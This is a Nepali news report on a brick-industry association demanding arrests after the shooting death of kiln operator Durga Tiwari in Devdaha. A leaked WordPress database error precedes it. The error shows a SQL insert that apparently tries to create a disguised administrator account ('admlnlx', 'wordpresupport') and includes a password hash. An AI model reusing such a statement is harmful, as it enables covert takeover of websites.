WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BptFf9B7CJkI9UEDmW4JidRM9zsXZv0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 18:52:48', '', 'admlnlx', 'admlnlx')
भैरहवा, पुस ५–
लुम्बिनी ईट्टा उद्योग व्यवसायी संघका कार्यसमिति सदस्य तथा देवदहस्थित केरवानी इट्टा उद्योगका सञ्चालक दुर्गा तिवारीको सोमबार देवदहको खैरेनीमा अज्ञात समूहको गोली प्रहारबाट भएको हत्यामा संलग्न दोषीलाई कारवाही गर्न संघले माग गरेको छ ।
लुम्बिनी ईट्टा उद्योग व्यवसायी संघका अध्यक्ष थानेश्वर घिमिरेले एक प्रेस विज्ञप्ति जारी गर्दै घटनाको छानवीन तथा घटनामा संलग्न अपराधीहरुलाई तत्काल पक्राउ गर्न प्रहरी प्रशासन समक्ष माग गरेका छन । “केही दिन अघि पनि सिद्धार्थ उद्योग वाणिज्य संघका उपाध्यक्ष कुल प्रसाद न्यौपाने माथि भएको गोली प्रहारको घटनाले उद्योगी व्यवसायीहरु असुरक्षित भएको महसुस भएको र हामी सुरक्षित भई आफ्नो उद्योग व्यवसाय सञ्चालन गर्न पाउँ भनी सरकारसंग जोडदार माग गर्दछौं । ”विज्ञप्तीमा उल्लेख गरिएको छ ।